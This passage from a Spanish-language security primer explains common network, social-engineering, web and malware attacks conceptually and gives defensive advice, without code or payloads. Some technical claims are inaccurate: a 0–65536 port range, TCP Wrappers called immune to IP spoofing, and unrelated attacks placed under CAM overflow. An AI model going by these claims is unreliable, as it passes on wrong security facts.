ocultar la identidad del remitente o hacerse pasar por otro sistema informático. ## 6. ACK flood Esta es una técnica para enviar un paquete TCP / ACK al objetivo a menudo con una dirección IP falsificada. Es muy similar a los ataques de inundación TCP / SYN ## 7. Ataque FTP Bounce El atacante puede conectarse a los servidores FTP y tiener la intención de enviar archivos a otros usuarios / máquinas que usan el comando PORT. Para que el servidor FTP intente enviar el archivo a otras máquinas en un puerto específico y verifique que el puerto esté abierto. Es obvio que la transferencia de FTP estaría permitida en los firewalls. En estos días casi todo los servidores FTP se implementan con el comando PORT desactivado. ## 8. TCP Session Hijacking Es el caso cuando el "Hacker" toma la sesión TCP existente, ya establecido entre las dos partes. En la mayoría de las sesión TCP la autenticación ocurre al comienzo de la sesión, los piratas informáticos realizan este ataque en dicho momento. ## 9. Ataque Man-In-The-Middle Un ataque MITM ocurre cuando una comunicación entre dos sistemas es interceptada por una entidad externa. Esto puede suceder en cualquier forma de comunicación en línea, como correo electrónico, redes sociales, navegación web, etc. No solo están tratando de escuchar nuestras conversaciones privadas, sino que también pueden dirigir toda la información dentro de los dispositivos. Quitando todos los detalles técnicos, el concepto de un ataque MITM se puede describir en un escenario simple . Si imaginamos que volvemos a los tiempos antiguos cuando el correo de caracol abundaba. Jerry le escribe una carta a Jackie en la que le expresa su amor después de años de ocultar sus sentimientos. Él envía la carta a la oficina de correos y es recogido por un cartero entrometido. La abre y, por puro gusto, decide reescribir la carta antes de entregar el correo a Jackie. Esto puede hacer que Jackie odie a Jerry por el resto de su vida. Un ejemplo más moderno sería un hacker entre nosotros (y nuestro navegador) y el sitio web que está visitando para interceptar y capturar cualquier información que enviamos al sitio, como credenciales de inicio de sesión o información financiera. ### ¿Cómo prevenir ataques Man-In-The-Midle? Los ataques de MITM realmente pueden "incomodar" simplemente al escuchar su concepto básico, pero eso no significa que sean imposibles de evitar. La tecnología PKI puede ayudarlo a protegerse de algunos de los tipos de ataques que discutimos anteriormente. 1. S / MIME - Extensiones de correo de Internet seguras / multipropósito, o S / MIME abrevia, encripta los correos electrónicos en reposo o en tránsito , asegurando que solo los destinatarios puedan leerlos y sin dejar margen para que los piratas informáticos se introduzcan y alteren nuestros mensajes. Además, S / MIME permite firmar digitalmente los correo electrónico con un Certificado digital único para cada persona. Esto vincula la identidad virtual a nuestro correo electrónico y brinda a los destinatarios la garantía de que el correo electrónico que recibieron en realidad proviene de nosotros (a diferencia de un hacker que accede a nuestro servidor de correo). Si bien los piratas informáticos pudieran tener acceso a los servidores de correo de las empresas para firmar digitalmente los mensajes, también necesitarían acceder a las claves privadas de los empleados, que generalmente se almacenan de forma segura en otro lugar. Estandarizar la firma digital de mensajes y educar a los destinatarios para que solo confíe en los mensajes de la empresa que se han firmado puede ayudar a diferenciar los correos electrónicos legítimos de los que se han falsificado. 1. Certificados de autenticación - Los piratas informáticos nunca desaparecerán, pero una cosa que podemos hacer es que sea prácticamente imposible penetrar en los sistemas (por ejemplo, redes Wi-Fi , sistemas de correo electrónico, redes internas) mediante la implementación de autenticación basada en certificados para todas las máquinas y dispositivos de los empleados. Esto significa que solo los puntos finales con certificados configurados correctamente pueden acceder a sus sistemas y redes. Los certificados son fáciles de usar (no se necesita hardware adicional para administrar o se necesita mucha capacitación del usuario) y las implementaciones se pueden automatizar para simplificar las cosas y hacer que los hackers tengan más dificil un ataque. ## 10. Ataque Ingenieria Social La ingeniería social es el arte de manipular a las personas para que renuncien a la información confidencial. Los tipos de información que buscan estos delincuentes pueden variar, pero cuando los individuos son blanco, los delincuentes generalmente intentan engañarlo para que le dé su contraseña o información bancaria, o acceda a su pc para instalar en secreto el software malicioso, que le dará acceso a su contraseñas e información bancaria, así como para darles control sobre el mismo. Los delincuentes usan tácticas de ingeniería social porque generalmente es más fácil explotar la inclinación natural a confiar que descubrir formas de hackear tu software. Por ejemplo, es mucho más fácil engañar a alguien para que le dé su contraseña que intentar piratear su contraseña (a menos que la contraseña sea realmente débil). La seguridad se trata de saber en quién y en qué confiar. Saber cuándo y cuándo no hacerlo, para tomar la palabra de una persona; cuándo confiar en que la persona con la que nos estamos comunicando es de hecho la persona con la que piensas que te estás comunicando; cuándo confiar en que un sitio web es o no es legítimo; cuándo confiar en que la persona que está hablando por teléfono es o no es legítima; cuando proporcionar nuestra información es o no es una buena idea. Pregúntele a cualquier profesional de la seguridad y te dirán que el eslabón más débil en la cadena de seguridad es el ser humano que acepta a una persona o un escenario al pie de la letra. No importa cuántas cerraduras y cerrojos hay en nuestras puertas y ventanas, o si tenemos perros guardianes, sistemas de alarma, reflectores, cercas con alambre de púas y personal de seguridad armado; si confiamos en la persona de la puerta que dice que él es el repartidor de pizzas y lo dejamos entrar sin verificar primero si es legítimo, estamos completamente expuesto a cualquier riesgo que represente dejarle entrar. ### ¿Cómo Prevenir ataques de ingenieria social? [Vídeo](https://www.youtube.com/watch?v=xDdVnRHO3CE) - Ve más despacio. Los spammers quieren que actúes primero y pienses más tarde. Si el mensaje transmite una sensación de urgencia o usa tácticas de venta de alta presión, debemos ser escépticos. Nunca debemos dejar que la urgencia influya en nuestra revisión cuidadosa. - Investigua los hechos. Sospecha de cualquier mensaje no solicitado. Si el correo electrónico parece ser de una empresa que nosotros utilizamos, debemos hacer nuestra propia investigación. Usar un motor de búsqueda para ir al sitio de la compañía real, o una guía telefónica para encontrar su número de teléfono. - Eliminar cualquier solicitud de información financiera o contraseñas. Si nos piden que respondamos a un mensaje con información personal, es una estafa. - Rechace las solicitudes de ayuda u ofertas de ayuda. Las empresas y organizaciones legítimas no se ponen en contacto con para brindarnos ayuda. Si no solicitó específicamente la ayuda del remitente, considere cualquier oferta para 'ayudar', una estafa. Del mismo modo, si recibimos una solicitud de ayuda de una organización benéfica u organización con la que no tenemos una relación, elimínala. Para dar, busque organizaciones caritativas de buena reputación por su cuenta para evitar caer en una estafa. - No permitir que un enlace controle dónde acaba. Mantén el control buscando el sitio web tú mismo usando un motor de búsqueda para asegurarnos de que terminamos donde planeamos terminar. Al pasar el raton sobre los enlaces en el correo electrónico, se mostrará la URL real en la parte inferior, pero una buena copia falsa, puede guiarnos incorrectamente. La curiosidad conduce a clics descuidados,si no sabemos de qué se trata el correo electrónico, hacer clic en enlaces es una opción inadecuada. Del mismo modo, nunca debemos usar números de teléfono para el correo electrónico. - El secuestro de correo electrónico es desenfrenado . Los piratas informáticos, los generadores de correo no deseado y los generadores de redes sociales que toman el control de las cuentas de correo electrónico de las personas (y otras cuentas de comunicación) han crecido descontroladamente. Una vez que controlan la cuenta de correo electrónico de alguien, se aprovechan de la confianza de todos los contactos de la persona. Incluso cuando el remitente parece ser alguien que usted conoce, si no espera un correo electrónico con un enlace o archivo adjunto, verifica con tu amigo antes de abrir enlaces o descargar. - Cuidado con cualquier descarga. Si no conocemos al remitente personalmente pero esperamos un archivo de ellos, descargar cualquier cosa, puede ser un error. - Las ofertas extranjeras son falsas . Si recibimos correos electrónicos de loterías o sorteos extranjeros, dinero de un pariente desconocido o solicitudes para transferir fondos desde un país extranjero por una parte del dinero, es una estafa. - Establezcer los filtros de spam a niveles altos. Cada programa de correo electrónico tiene filtros de spam. Para encontrar el suyo, busque en las opciones de configuración y establezca estos valores altos, solo recuerde revisar su carpeta de spam periódicamente para ver si el correo electrónico legítimo ha llegado accidentalmente allí. También podemos buscar una guía paso a paso para configurar los filtros de spam buscando en el nombre de su proveedor de correo electrónico. - Asegurar los dispositivos informáticos. Instalar software antivirus , cortafuegos, filtros de correo electrónico y mantenerlos actualizados. Configurar los sistemas operativo para que se actualicen automáticamente. Utilizar una herramienta anti-phishing ofrecida en el navegador web , normalmente en modo de plugin, es tambien una gran idea. ## 11. OS Finger Printing El término "huella digital del sistema operativo" / OS Finger Printing en Ethical Hacking se refiere a cualquier método utilizado para determinar qué sistema operativo se ejecuta en una computadora remota. Al analizar ciertos indicadores de protocolo, opciones y datos en los paquetes que un dispositivo envía a la red, podemos hacer conjeturas relativamente precisas sobre el sistema operativo que envió esos paquetes. Al identificar el sistema operativo exacto de un host, un atacante puede lanzar un ataque preciso contra una máquina destino. En un mundo de desbordamientos de búfer, conocer el sabor y la arquitectura exactos de un sistema operativo podría ser toda la oportunidad que un atacante necesita. ### Tipos de ataques OS Finger Printing 1. OS Finger Printing activa - El Finger Printing activo se logra enviando paquetes especialmente diseñados a una máquina de destino y luego anotando su respuesta y analizando la información recopilada para determinar el sistema operativo objetivo. 1. OS Finger Printing pasivo La huella dactilar pasiva se basa en rastros de olfatear el sistema remoto. En función de las trazas de sniffer (como Wireshark) de los paquetes, podemos determinar el sistema operativo del host remoto. ## 12. Conóce tus puertos expuestos Un escaneo de puertos se define como una aplicación o pieza de software específica del proceso que sirve como punto final de comunicaciones. Este punto final es utilizado por los protocolos de la capa de transporte del conjunto de protocolos de Internet, concretamente, TCP y UDP se utilizan universalmente para comunicarse en Internet. Cada puerto también se identifica con un entero sin signo de 16 bits llamado número de puerto. "En la terminología TCP / IP, un puerto es un identificador de software que corresponde a una aplicación o protocolo específico que se ejecuta en un host". Por ejemplo, Http usa el puerto 80. Los números de puerto están separados en tres rangos: Puertos conocidos , Puertos registrados y Puertos dinámicos y / o privados. En el mundo de la intrusión informática, el escaneo de puertos es una de las técnicas de reconocimiento más utilizadas para descubrir servicios "pirateables". En la terminología cotidiana, es análogo a un ladrón caminando por un grupo de automóviles y probando las puertas de los automóviles para ver qué puertas del automóvil están abiertas. Sin embargo, un hecho importante a tener en cuenta es que el escaneo de puertos es utilizado por los administradores del sistema para diagnosticar problemas en nuestras redes. En resumen, todo escaneo de puertos es una serie de intentos de un intruso o administrador para ver qué puertos de una red están abiertos al intentar conectarse a un rango de puertos en un rango de hosts, para luego recopilar información de los puertos abiertos que responden a ver qué aplicaciones o servicios están asociados o ejecutándose en esos puertos. El escaneo de puertos se lleva a cabo mediante la implementación de software para escanear cualquiera de los 0 a 65536 puertos potencialmente disponibles en una computadora. ### ¿Cómo prevenir el escaneo de puertos? Si tenemos un servidor de acceso público, el sistema será vulnerable a los escaneos de puertos. No hay una forma segura de vencer los escaneos de puertos. Los sistemas judiciales han determinado que realizar exploraciones de puertos no es ilegal. Los escaneos de puertos son ilegales solo si el atacante usa información de un escaneo de puertos para explotar una vulnerabilidad o abrir un puerto en el sistema. Entonces, la pregunta es: ¿cómo limitamos la información que nuestros sistemas proporcionarán? Una forma de limitar la información obtenida de escaneos de puertos es cerrar los servicios innecesarios en los sistemas de destino, es decir, si está ejecutando un servidor web, http debe ser el único servicio ofrecido. En los sistemas UNIX, la manera más fácil de limitar la información proporcionada a los escáneres de puertos es editar el /etc/inetd.conf y comentar cualquier servicio innecesario. También editar el /etc/init.d y el archivo de nivel de ejecución que el sistema está devolviendo. Eliminar los servicios innecesarios. Además, asegurarnos de que el sistema no se esté ejecutando en el modo X11. Si se está ejecutando en el modo X11, el sistema transmitirá el servicio 6000 ya sea que haya iniciado sesión o no. Otra forma de limitar la información proporcionada a los escáneres de puertos es emplear encapsuladores TCP, cuando corresponda. Los Contenedores TCP dan al administrador la flexibilidad de permitir o denegar el acceso a los servicios en base a las direcciones IP o nombres de dominio. Las capsulas de TCP funcionan junto con el archivo /etc/inetd.conf. TCP Wrappers funciona invocando el tcpd daemon antes de proporcionar el servicio especificado. Cuando se detecta una solicitud entrante procedente de un puerto autorizado, los contenedores TCP verifican primero el archivo /etc/hosts.allow para ver si la dirección IP o el nombre de dominio tiene permisos para acceder al servicio. Si no se encuentra ninguna entrada, TCP Wrappers verificará el archivo /etc/hosts.deny. Si no se encuentra ninguna entrada allí, o si se encuentra la instrucción ALL: ALL, los Contenedores TCP ignorarán la solicitud y no permitirán que se utilice el servicio solicitado. Cuando se escanea el sistema , los contenedores TCP aún permitirán que se anuncie el servicio; sin embargo, el escáner no recibirá ninguna información adicional del puerto a menos que el escaneo provenga de un host o dominio especificado en /etc/hosts.allow. Cuando se escanea, el sistema mostrará el servicio como abierto. Cuando el atacante intenta explotar el puerto abierto, TCP Wrappers rechazará la conexión entrante si no proviene de un host o dominio aprobado. El inconveniente de TCP Wrappers es que no todos los servicios están cubiertos. Los servicios como http y smtp no están cubiertos, y si no están configurados correctamente, serán susceptibles de explotación. TCP Wrappers no es susceptible a la suplantación de IP. Cuando se detecta una solicitud entrante, TCP Wrappers realizará una búsqueda DNS inversa en la dirección IP solicitante. Si la búsqueda inversa coincide con la IP solicitante, los contenedores TCP permitirán la conexión. Si la búsqueda inversa falla, TCP Wrappers supondrá que se trata de un host no autorizado y no permitirá la conexión. Finalmente, otra forma de limitar la cantidad de información dada a los escaneos de puertos es utilizar productos como PortSentry ofrecido por Psionic. PortSentry detecta las solicitudes de conexión en una serie de puertos seleccionados. PortSentry es personalizable y se puede configurar para ignorar una cierta cantidad de intentos. El administrador puede seleccionar qué puertos escuchará PortSentry para las solicitudes de conexión y la cantidad de solicitudes no válidas. El administrador enumerará los puertos que su sistema no admite. Tras la detección, PortSentry empleará los contenedores TCP y realizará una entrada en el archivo /etc/hosts.deny para el sospechoso de intrusión. PortSentry también configurará una declaración de ruta predeterminada para el sistema infractor. La instrucción de ruta predeterminada encaminará todos los paquetes desde el sistema infractor a otro sistema o a un sistema inactivo. El resultado es que el sistema objetivo aparecerá como inexistente. En los sistemas Linux, PortSentry puede detectar todos los escaneos TCP y UDP, mientras que en los sistemas Solaris solo pueden detectar los escaneos TCP Vanilla y UDP. Instalar y configurar PortSentry : [Vídeo](https://www.youtube.com/watch?v=YdMxk9wKnjk) ## 13. KeyLoggers Un keylogger puede ser un programa de software o un hardware que utiliza un atacante para registrar las pulsaciones de teclas en el teclado de un usuario. Con un Keylogger, un atacante puede conocer remotamente sus contraseñas, números de tarjetas de crédito / débito, mensajes, correos electrónicos y todo lo que escriba. Es más probable que los registradores de pulsaciones de teclas estén basados en software que en hardware, ya que estos últimos requerirían acceso físico al dispositivo. Los registradores de pulsaciones basados en software generalmente infectan el sistema en forma de un malware que un usuario podría haber descargado haciendo clic en un enlace malicioso, ya sea en línea o enviándolo por correo electrónico. Un software de captura de teclas se ejecuta en segundo plano sin notificar al usuario y tomará nota de cada golpe de teclado y luego lo alimentará a un servidor en línea al que puede acceder el atacante. Revisar todo el historial de registros de teclas puede brindarle a cualquiera una idea de los sitios web que visitó y la información que ingresó en ellos, lo que le da una forma fácil de acceder a la tarjeta de crédito o credenciales de banca por Internet. Los ataques de teclado son utilizados por los atacantes con intención maliciosa de monitorear las pulsaciones de teclas, siendo importante protegerse contra ellos, para que no seamos vulnerable a perder información de identificación personal, incluidas las credenciales personales o corporativas. ### ¿Cómo prevenir los keylogger? Si bien hay varias herramientas disponibles para encontrar y hacer frente a los keyloggers de software, no existe un software de seguridad para identificar un keylogger hardware. Dado que los registradores de teclas son básicamente malware, basta con un programa antivirus que proteja el PC en tiempo real, pero si deseamos protección adicional, también se puedemos usar programas tales como Zemana AntiLogger y SpyShelter Stop-Logger. La versión gratuita de Zemana solo proporciona cifrado para sus pulsaciones de teclas, lo que significa que, aunque el atacante podrá registrar sus pulsaciones de teclas, se le presentarán en un formato codificado e ilegible. La versión gratuita de SpyShelter no solo proporciona cifrado, sino que también protege el PC contra capturas de pantalla o portapapeles. Si no deseamos utilizar un registrador de teclas, siempre se recomienda utilizar el teclado en línea disponible en los sitios web bancarios, por ejemplo, que no deja rastros de registro de teclas. Si sospechamos que las pulsaciones de teclas están siendo registradas, y ninguno de estos softwares puede identificarlo o protegerlo de él, entonces probablemente alguien ingresó un keylogger hardware en el PC. Estos registradores de teclas hardware generalmente vienen en forma de conectores USB. Uno de los extremos está conectado al teclado y otro al USB de la PC, y aunque todo funciona sin problemas, el hardware intercepta y transmite las pulsaciones de las teclas al atacante, es revisar nuestro PC de vex en cuando. ## 14. ICMP Tunneling El tunneling se usa a menudo para eludir los firewalls que no bloquean los paquetes ICMP, o para establecer un canal de comunicación cifrado y difícil de rastrear entre dos computadoras sin interacción directa de la red. Un túnel ICMP establece una conexión encubierta entre dos computadoras remotas (un cliente y un proxy), utilizando solicitudes de eco ICMP y paquetes de respuesta. Un ejemplo de esta técnica es tunelizar el tráfico TCP completo a través de peticiones y respuestas de ping. ### ¿Cómo prevenir túneles ICMP? Resulta difícil detener la creación de túneles ICMP ya que el cortafuegos personal los infunde como mensajes de control emitidos por el sistema operativo. La encriptación y autenticación fuertes, además de la creación de túneles ICMP, empeora la situación. Por lo tanto, la solución para evitar el túnel ICMP debería: - Permitir a los administradores usar mensajes ICMP libremente. - Permitir el paso del gran tamaño de ICMP. - Debería funcionar incluso en el caso de una fuerte autenticación y carga útil encriptada. - Debería funcionar incluso cuando la máquina está detrás de cortafuegos personales a nivel de aplicación. En comparación con el modelo costoso de preservación del estado utilizado por los cortafuegos industriales, se propone un modelo simple de menos estado para evitar el efecto túnel. El modelo sin estado satisface los requisitos mencionados anteriormente. El modelo sin estado requiere un acuerdo común sobre la carga permisible de los mensajes ICMP. La política debería implementarse en la implementación del protocolo ICMP del kernel. Se debe hacer cumplir ya sea cuando un paquete ICMP sube la pila de la red o cuando baja la misma. ## 15. Ataque LOKI LOKI es un programa cliente / servidor publicado en la publicación en línea Phrack. Este programa es una prueba de concepto que funciona para demostrar que los datos se pueden transmitir de forma secreta a través de una red escondiéndolos en el tráfico que normalmente no contiene cargas útiles. Por ejemplo, el código puede tunelizar el equivalente de una sesión RCMD / RSH de Unix en paquetes de solicitud de eco ICMP (ping) o tráfico UDP al puerto DNS. Esto se usa como una puerta trasera en un sistema Unix después de que el acceso a la raíz ha sido comprometido. La presencia de LOKI en un sistema es evidencia de que el sistema se ha visto comprometido en el pasado. ## 16. Ataque de secuencia TCP Un ataque de predicción de secuencia TCP es un intento de predecir el número de secuencia utilizado para identificar los paquetes en una conexión TCP, que se puede usar para duplicar paquetes que conducen al secuestro de la sesión. En un escenario típico de ataque de predicción de secuencia TCP, un atacante pasaría algún tiempo monitorizando el flujo de datos entre dos hosts, uno de los cuales es el sistema de destino. El atacante cortaría el otro sistema (que es confiable para el objetivo) de la comunicación, tal vez a través de un ataque de denegación de servicio (DoS), dejándolos a sí mismos para tomar el lugar de ese sistema confiable, a los ojos de su objetivo . [Imagen: Ataque de Secuencia TCP] Habiendo predicho el número de secuencia del siguiente paquete que el objetivo espera de su host de confianza, el atacante prepara un paquete con la dirección IP de origen del sistema de confianza y el número de secuencia esperado. Es seguro que este paquete llegará a su destino antes que cualquier información legítima del host confiable (que tiene un ataque DoS para mantenerlo ocupado y fuera de la imagen). El paquete del atacante se puede usar como una vía para obtener acceso al sistema de destino, terminar a la fuerza una comunicación o entregar una carga maliciosa. ### ¿Cómo prevenir el ataque de secuencia TCP? En respuesta a sus propias observaciones, el Equipo de trabajo de ingeniería de Internet (IETF) emitió un estándar renovado (RFC 6528) en 2012, estableciendo un algoritmo mejorado para generar números de secuencia iniciales para las comunicaciones TCP. Está diseñado para aumentar la robustez de la generación del número de secuencia frente al tipo de análisis predictivo y monitoreo que permitieron a los ciberatacantes un acceso tan fácil al número de secuencia bajo el antiguo régimen. A nivel empresarial, los fabricantes de sistemas operativos respondieron a la amenaza mediante la introducción de métodos nuevos y más impredecibles de generación de números de secuencia, una medida que se logró con un éxito parcial. Una estrategia más efectiva ha sido que las organizaciones y los administradores de red bloqueen paquetes enrutados de origen y paquetes de datos con direcciones dentro de sus propias redes. Los servicios que dependen de la autenticación basada en IP deberían, idealmente, desconectar una conexión por completo al detectar que están presentes las opciones enrutadas de origen. ## 17. CAM Table Overflow La tabla CAM de un conmutador contiene información de red, como las direcciones MAC disponibles en los puertos físicos del conmutador y los parámetros de VLAN asociados. Los desbordamientos de la tabla CAM ocurren cuando una entrada de direcciones MAC se inunda en la tabla y se alcanza el umbral de la tabla CAM. Esto hace que el conmutador actúe como un concentrador, inundando la red con tráfico fuera de todos los puertos. La inundación causada por un desbordamiento de tabla CAM está limitada a la VLAN de origen, por lo tanto, no afecta a otras VLAN en la red. 1. Ataques de redireccionamiento ICMP: - Los mensajes de redirección de ICMP se utilizan para redirigir un host de origen para usar una puerta de enlace diferente que pueda estar más cerca del destino. Estos mensajes de redirección son enviados por la puerta de enlace de recepción y el host de origen debe adaptar su reenvío en consecuencia cuando recibe este mensaje. Los redireccionamientos ICMP se utilizan con mayor frecuencia en entornos de enrutamiento de origen donde el host de origen calcula rutas de enrutamiento a todos los destinos. Los redireccionamientos ICMP también se pueden usar para amplificar ataques SMURF o FRAGGLE o para configurar ataques Man-in-the-Middle. 1. Ataque de transferencia de zona DNS: Una solicitud de transferencia de zona a un servidor DNS devuelve una lista completa de nombres de host y direcciones IP en el dominio. Por lo general, las transferencias de zona solo deben realizarse entre servidores DNS autoritativos para un dominio. Los atacantes pueden consultar servidores DNS para compilar una lista de posibles hosts para atacar. Esta firma detecta transferencias de zona intentadas desde fuentes distintas a los servidores DNS. ### ¿Cómo prevenir los ataques CAM Overflow? Para prevenir este tipo de ataque, cambiaremos el puerto a un puerto de acceso emitiendo acceso en modo de puerto de conmutación. Luego asignaremos la cantidad máxima de direcciones MAC en las que se almacenará la tabla CAM para esta interfaz. Finalmente elegiremos nuestra acción de violación que se aplicará cuando el usuario (atacante) intente generar más de X direcciones MAC asociadas al mismo puerto. Elegimos cerrar este puerto, ahora si el atacante intenta realizar este ataque nuevamente en dicho swhit su puerto se apagará automáticamente, también se generará un registro en este que informa al administrador que el (atacante) MAC la dirección en este puerto estaba tratando de atacarnos y el estado del puerto ahora está abajo/cerrado. ## 18. Ataques a Aplicaciones Web 1. Inyección SQL: - También se denomina Ataque de Inserción SQL que ayuda al hacker a ejecutar un código debido a la presencia de vulnerabilidad en la capa de la base de datos de la Aplicación. En consecuencia, el código obtendrá datos confidenciales o incluso comprometerá la aplicación en sí. 1. Cross-Site Request: - La falsificación de solicitudes entre sitios, también conocida como ataque con un solo clic o sesión y abreviado como CSRF ("sea-surf") o XSRF, es un tipo de exploit malicioso de un sitio web mediante el cual se transmiten comandos no autorizados de un usuario en el que el sitio web confía. A diferencia de los scripts de sitios cruzados (XSS), que explota la confianza que un usuario tiene para de un sitio en particular, CSRF explota la confianza que un sitio tiene en el navegador de un usuario. 1. Ataque de envenenamiento de cookies: - Los ataques de envenenamiento de cookies implican la modificación de los contenidos de una cookie (información personal almacenada en la computadora de un usuario web) para eludir los mecanismos de seguridad. Al usar ataques de envenenamiento de cookies, los atacantes pueden obtener información no autorizada sobre otro usuario y robar su identidad. 1. Robo de cookies: - Este tipo de ataques se realizan mediante scripts del lado del cliente como JavaScript. Cuando el usuario hace clic en un enlace, el script buscará la cookie almacenada en la memoria de la computadora para todas las cookies activas y las enviará (al parecer, los correos electrónicos) al atacante. 1. Ataques de phishing: - Phishing es el proceso criminalmente fraudulento de intentar adquirir información sensible como nombres de usuario, contraseñas y detalles de tarjetas de crédito haciéndose pasar por una entidad confiable en una comunicación electrónica. 1. Web Defacement: - La desfiguración del sitio web es un ataque a un sitio web que cambia la apariencia visual del sitio. Estos son típicamente el trabajo de los crackers del sistema, que entran en un servidor web y reemplazan el sitio web alojado con uno propio. Lo más probable es que este tipo de ataques se hagan intencionalmente para arruinar la reputación de la compañía que ha alojado este sitio web. 1. Buffer Overflow: - El desbordamiento de búfer, o el desbordamiento del búfer, es una anomalía en la que un proceso almacena datos en un búfer fuera de la memoria que el programador reservó para ello. Los datos adicionales sobrescriben la memoria adyacente, que puede contener otros datos, incluidas variables de programa y datos de control de flujo del programa. Esto puede provocar errores de acceso a la memoria, resultados incorrectos, finalización del programa o una violación de la seguridad del sistema. Esta vulnerabilidad es completamente un error del Programador. 1. Navegación forzada: - La exploración forzada es un ataque cuyo objetivo es enumerar y acceder a los recursos a los que la aplicación no hace referencia, pero que aún son accesibles. Por ejemplo, directorios como config, backup, logs a los que se puede acceder pueden revelar mucha información sobre la aplicación en sí, contraseña, actividades, etc. 1. División de respuesta HTTP: - Un atacante pasa datos maliciosos a una aplicación vulnerable, y la aplicación incluye los datos en un encabezado de respuesta HTTP. Este ataque en sí no causa ningún daño, pero daría lugar a otros ataques sensibles como XSS. 1. Defectos de inyección: - Las fallas de inyección permiten a los atacantes retransmitir código malicioso a través de una aplicación web a otro sistema. Estos ataques incluyen llamadas al sistema operativo a través de llamadas al sistema, el uso de programas externos a través de comandos del shell, así como llamadas a bases de datos de backend a través de SQL (es decir, inyección de SQL). Los scripts completos escritos en Perl, Python y otros lenguajes pueden ser inyectados en aplicaciones web mal diseñadas y ejecutado. Cada vez que una aplicación web utiliza un intérprete de cualquier tipo, existe el peligro de un ataque de inyección. Cada vez que una aplicación web utiliza un intérprete de cualquier tipo, existe el peligro de un ataque de inyección. ### ¿Cómo prevenir los ataques a apliciones web? Existen diferentes métodos y herramientas que los desarrolladores modernos de aplicaciones web usan para proteger un sitio web. Existen soluciones para ataques específicos y mejores prácticas que se pueden utilizar de forma continua para proteger las aplicaciones y los usuarios. Las revisiones de código, los programas de recompensa de errores y los escáneres de código deberían implementarse durante todo el ciclo de vida de la aplicación. Las revisiones de códigos pueden ayudar a detectar códigos vulnerables al principio de la fase de desarrollo, los escáneres de códigos dinámicos y estáticos pueden hacer comprobaciones automáticas de vulnerabilidades, y los programas de bonificación de errores permite a los tester/hacker profesionales encontrar errores en el sitio web. Las soluciones específicas de ataque incluyen: - Usar procedimientos almacenados con parámetros que se parametrizan automáticamente. - Implementando CAPTCHA o incitando a los usuarios a responder preguntas. Esto asegura que un formulario y una solicitud sean enviados por un humano y no por un bot. - Y lo mas importante, utilizar un cortafuegos de aplicación web (WAF) para supervisar la red y bloquear posibles ataques. Ninguno de estos métodos puede reemplazar al otro,cada uno aporta su propio valor a la tabla y agrega protección contra ciertos escenarios de ataque. No puede encontrar todas las vulnerabilidades mediante revisiones de código o programas de bonificación de errores, ni solo mediante un cortafuegos de aplicación web ya que ninguna herramienta está 100% segura. Se debe usar una combinación de todos estos métodos para proteger las aplicación y a sus usuarios. ## 19. Virus Un virus informático es un programa informático que puede copiarse e infectar una computadora. El término "virus" también se usa comúnmente pero erróneamente para referirse a otros tipos de malware, incluidos, entre otros, los programas de adware y spyware que no tienen la capacidad reproductiva. Un virus verdadero puede propagarse de una computadora a otra (en algún tipo de código ejecutable) cuando su host se lleva a la computadora de destino; por ejemplo, porque un usuario lo envió a través de una red o Internet, o lo llevó en un medio extraíble, como una unidad USB. ## 20. Gusanos Un gusano informático es un programa informático de malware autoreplicante. Utiliza una red informática para enviar copias de sí mismo a otros nodos (computadoras en la red) y puede hacerlo sin intervención del usuario. Esto se debe a deficiencias de seguridad en la computadora de destino. A diferencia de un virus, no es necesario que se una a un programa existente. Los gusanos casi siempre causan al menos algún daño a la red, al consumir ancho de banda, mientras que los virus casi siempre corrompen o modifican archivos en una computadora específica. ## 21. Malware Malware es una forma corta de software malicioso. El malware no es lo mismo que el software defectuoso, es decir, el software que tiene un propósito legítimo pero contiene errores dañinos. El malware incluye virus informáticos, gusanos, caballos de Troya, spyware, adware deshonesto, software delictivo, la mayoría de los rootkits y otro software malicioso y no deseado. ### ¿Como prevenir el Malware? 1. Instalar software Anti-Virus / Malware. - Este consejo puede ser evidente. Sin embargo, he visto muchos PCs, especialmente PCs pesonales, que no tienen protección antivirus / malware. Esta protección es un primer paso imprescindible para mantenernos libres de virus. 1. Mantener el software antivirus actualizado. - Tener software de protección es el primer paso; mantenerlo es el segundo. El software antivirus gratuito es mejor que nada, pero tenga en cuenta que no es la mejor solución. Microsoft proporciona un paquete de seguridad "gratis". Es gratis si tiene Windows en su máquina, se le concede acceso. Muchos usuarios no conocen este programa, pero en realidad es una protección decente. 1. Ejecuta escaneos regulares programados del antivirus. - Esto también puede parecer obvio, pero muchos de nosotros nos olvidamos de hacer esto. Configurar el software de elección para que se ejecute a intervalos regulares. Es prefible una vez por semana, pero no debemos esperra mucho más entre escaneos. Es difícil trabajar en su computadora mientras se está ejecutando el software antivirus. Una solución es ejecutar el software por la noche cuando no se está usando el PC. Sin embargo, a menudo apagamos nuestras computadoras por la noche, por lo que el escaneo nunca se ejecuta. Configurar el software antivirus para que se ejecute en una noche específica, y siempre dejar wl PC encendido ese día. Asegurarnos de que no se apague automáticamente o entre en modo de hibernación. 1. Mantener el sistema operativo al día. - Ya sea que esté ejecutando Windows, Mac OS X, Linux o cualquier otro sistema operativo, mantenerlo actualizado. Los desarrolladores de SO siempre emiten parches de seguridad que arreglan y completan las filtraciones de seguridad. Estos parches ayudarán a mantener un sistema seguro. Del mismo modo, mantener un software antivirus actualizado. Los virus y el malware se crean de forma contínua. Si nuestro software de escaneo es tan bueno como nuestra base de datos. También debe ser lo más actualizado posible. 1. Asegurar la red. - Muchas de nuestras computadoras se conectan a nuestros archivos, impresoras o Internet a través de una conexión Wi-Fi. Debemos asegurarnos de que se requiere una contraseña para acceder y que la contraseña es fuerte. Nunca debemos transmitir por una conexión Wi-Fi abierta. Usaremos cifrado WPA o WPA2. Ya que el WEP no es lo suficientemente fuerte ya que los expertos lo pueden romper en minutos. También es una buena idea no difundir su SSID (el nombre de su red Wi-Fi) e importante tambien, proporcionar un SSID de invitados que use una contraseña diferente. 1. Piensa antes de hacer clic. - Evitar los sitios web que proporcionan material pirateado. No abrir un archivo adjunto de correo electrónico de alguien o una empresa que no conocemos. No hacer clic en un enlace en un correo electrónico no solicitado. Siempre colocar el cursor sobre un enlace (especialmente uno con un acortador de URL) antes de hacer clic para ver hacia dónde nos lleva realmente el enlace. Si tenemos que descargar un archivo de Internet, un correo electrónico, un sitio FTP, un servicio de intercambio de archivos, etc., buscarlo antes de ejecutarlo. Un buen software antivirus lo hará de forma automática, pero debemos asegurarnos de que se está haciendo. 1. Mantener la información personal segura. - Esto es probablemente lo más difícil de hacer en Internet. Muchos hackers accederán a nuestros archivos no mediante la fuerza bruta, sino a través de la ingeniería social. Recibirán suficiente información para acceder a 